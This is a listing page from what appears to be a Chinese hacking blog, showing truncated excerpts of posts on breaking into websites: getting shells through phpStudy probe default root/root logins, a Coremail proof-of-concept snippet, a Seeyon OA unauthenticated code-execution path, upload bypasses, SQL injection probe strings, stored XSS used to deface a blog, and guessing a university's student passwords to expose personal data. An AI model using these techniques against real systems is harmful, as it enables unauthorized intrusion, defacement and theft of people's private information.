技术教程 - Kirin博客-Kirin博客全网最大的免费网络资源分享平台

七彩网络

毒蜂网络独家模板

技术教程

这家伙很懒,还没填写该栏目的介绍呢~

技术教程

利用PHPstudy探针弱口令漏洞批量拿shell

关键字:phpStudy 探针 2014 搜到后随便找一个站 然后打开是这种的 弱口令:root 成功,如下图 然后进入phpmyadmin 后台账号是root密码也是root 接下来就是怎么拿shell了 探针上面有个绝对路径和探针路径,我们这里需要的是绝对路径。如图 进入后台我们需要打开变量 然后在变量里面找到general log 和......

阅读(312)评论(0)

技术教程

关于coremail的0day附带poc

import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/” r = requests.get(url) if (r.status_code != ‘404’) and (“/home/cor......

阅读(136)评论(1)

技术教程

武汉某大学-学生信息泄露

也是无聊的时候无意间逛见的,进入主题。 看到可能会想怎么进去,我就去百度搜了一下教务管理系统用户名和密码是多少 百度告诉我的答案普遍是账号是学号密码也是学号或者密码是123456, 接下来知道了那么我们该怎么去获取学号呢。 1.百度武汉xxxx职业技术学院学号 如图 接下来去试试此学号有无有用。 上面百度收集到的信息说是密码可能是学号也可能是1......

阅读(167)评论(1)

技术教程

致远OA系统远程命令代码执行漏洞

1.致远OA A8无需认证代码执行漏洞 网站地址:http://127.0.0.1:8088/seeyon/index.jsp 因为不方便透露漏洞网址,就用127.0.0.1代替。网站页面如下↓↓↓ 2. 接下来用:/seeyon/htmlofficeservlet 来访问。http://127.0.0.1:8088/seeyon/htmloffi......

阅读(560)评论(0)

技术教程

一次实战拿shell上传绕过

一、物理路径 在url后面随便输入个字符,得到网站物理路径 二、whois信息 没有查到其他whois信息 三、Whatweb 四、端口 21端口是文件传输协议,如果被非正常手段登录,将会面临服务器/空间文件泄露问题 3306端口是mysql数据库的默认端口,如果被非正常手段登录,将会面临数据库......

阅读(242)评论(0)

技术教程

C语言-扬帆起航

用C语言在控制台输出 一些字符图案!!! 编译器:VS2019版本 代码如下 #include<stdio.h> #include<windows.h> int color(int c) { SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HAN......

阅读(106)评论(0)

技术教程

SQL注入语法

1.判断有无注入点: http://127.0.0.1/index.asp?id=1 and 1=1 http://127.0.0.1/index.asp?id=1 and 1=2 http://127.0.0.1/index.asp?id=1′ 2.猜字段数: http://127.0.0.1/index.asp?id=1 order b......

阅读(150)评论(0)

技术教程

CVE-2019-0708漏洞检测工具

CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。   GitHub项目:http......

阅读(396)评论(0)

技术教程

关于计算机运行的那些事

      今天为大家带来的是一篇如何合理的使用计算机的技术性文章,我相信很多使用计算机的小白在看完这篇文章后,一定会知道更多的关于计算机的使用方法。在日常的生活工作中,我们总是离不开计算机,对计算机的合理使用有助于我们提升工作效率,同时也有助于我们对计算机的管理。下面我从几个方面来讲述一下怎么来合理的使用。 一、关......

阅读(95)评论(0)

技术教程

[技术教程]Emlog程序储存型XSS漏洞测试

通过Emlog程序后台编辑器反射XSS漏洞 拿下一个博客站后台并挂黑页~ 这个漏洞呢 我很早之前就发现了 一直都没时间做这期文章 太多事情了 做一件事又忘了一件事 很难受 目前 很多Emlog的模板都已经修复了这个XSS漏洞 一小部分还没修复 所以 今天就利用这个漏洞原理 来拿下一个博客站的后台! ......

阅读(903)评论(0)

技术教程

如何访问”暗网”(慎入)

小编强烈声明:本文仅为学习探索使用,如出现任何违法事件,均属个人行为! 什么是暗网? 所谓的“暗网”,其英文原名叫作“Deep Web”,又称深层网络。 广泛意义上的“暗网”,指的是那些无法被搜索引擎收录内容的站点。也就是说,一切有着非公开访问机制的网站——比如1024,哈哈大家都懂得......

阅读(849)评论(0)